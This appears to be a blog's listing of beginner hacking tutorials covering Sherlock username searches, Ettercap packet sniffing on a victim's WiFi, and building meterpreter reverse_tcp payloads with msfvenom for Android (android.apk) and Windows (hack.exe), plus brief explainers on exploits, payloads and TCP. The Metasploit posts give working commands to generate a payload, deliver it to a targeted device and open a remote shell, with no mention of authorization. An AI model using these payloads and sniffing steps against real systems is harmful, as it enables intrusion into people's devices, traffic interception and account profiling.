Posts

Information Gathering Using sherlock

Image
  What is Sherlock? Sherlock is the information gathering tool that checks all platforms that contain a particular  account that contains by a particular name, e-mail id, Facebook -id  How to install it: To install it open the kali-Linux terminal  Type the command given bellow git clone https://github.com/sherlock-project/sherlock.git After that command hit enter Step1:- After  Cloning  sherlock type the following command cd sherlock Step2:- Then after fix-missing type the following command python3 -m pip install -r requirements.txt Step3:- After fixing requirements type the following command sherlock username    Here is the all information about my user name 😀😀😀

Packet Sniffing Attack (MITM Attack)

Image
   What is Packet Sniffing? --> Packet sniffing is the practice of gathering, collecting, and logging some or all packets that pass through a computer network, regardless of how the packet is addressed. In this way, every packet, or a defined subset of packets, may be gathered for further analysis. You as a network administrator can use the collected data for a wide variety of purposes like monitoring bandwidth and traffic    How This Works? --> A packet sniffer, sometimes called a packet analyzer, is composed of two main parts. First, a network adapter that connects the sniffer to the existing network. Second, software that provides a way to log, see or analyze the data collected by the device. Step1:- Using your system connect into victims network(WIFI Network) Step2:- open new root terminal in Kali Linux   Step3:- Start Ettercap(GUI) Write 'ettercap -g' Step4:- It will open Ettercap GUI  Click on ✔ Step5:- Click on scan for host Step6:- After c...

Exploitng Android using Metasploit

Image
      Step 1:- Open Terminal or Root Terminal in Kali-Linux Write the payload for android  which is given below      msfvenom -p android/meterpreter/reverse_tcp lhost=<Enter your IP address> lport=4444  > android.apk You can use any lport like 4444,8080     Step 2:- Send the apk file to the targeted device Then after installing it and it will ask for permission that shown bellow Then aftertouch on install Anyway      It will look like that shown in the image [MainActivity]       Step 3:- Write commands shown bellow msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost <Your IP address>  set lport  <which you write in payload> run/exploit Then after click on mainactivity on android [It's msfconsole] [It's all commands]                               ...

Exploiting Windows 10 using payload and reverse_tcp(Metasploit)

Image
         Step 1:- To get your IP address type the following command: ifconfig             Step 2:- Open terminal or Root terminal and type the following command :        msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<Enter your IP> -f exe > hack.exe you can use any lport like lport=4444,lport=8000          Step 3:- Find the file to the main desktop using drag and drop            Step 4:- In the terminal type the following command :   msfconsole   use exploit/multi/handler   set payload windows/x64/meterpreter/reverse_tcp   set lhost 192.168.43.110   set lport 8080   exploit          Step 5:-  Run the file which we put on the main desktop then after you will see the new meterpreter session   open         Step 5:- Type help...

What is exploit and payload

Image
       Exploit:- An exploit is a piece of code written to take advantage of a particular vulnerability           step 1         :-  open kali terminal  root terminal          step 2        :- write msfconsole                   step 3         :- write use exploit         step 4                    :- Example :-  exploit/windows/scada/igss9_igssdataserver_listall       Payload:- A payload is a piece of code to be executed through said exploit        step 1          :- open kali terminal or root terminal        step 2          :-write msfconsole         s...

What is reverse_tcp

Reverse_tcp is basically  instead of the attacker initiating the connection which will obviously be blocked by the firewall Instade,the device initiates the connection to the attacker, which will be allowed by the firewall and the attacker then take control of the device and pass commands. It's  a type of reverse shell

What is TCP

The full form of TCP is Transmission Control Protocol  It stands for communications standard that enables application Programs  It also computing devices to exchange messages over a network  It is designed to send  packets across the internet  and ensure the successful delivery of data and messages over the network  It's  a basically Three-way handshake                What is TCP used for? TCP is used for organizing data in a way that ensures the secure transmission between the server and client                Example of TCP World Wide Web ( HTTP)   E-mail (SMTP TCP) File Transfer Protocol (FTP)           That's it from my side. Thank you 😊. Comments are appreciated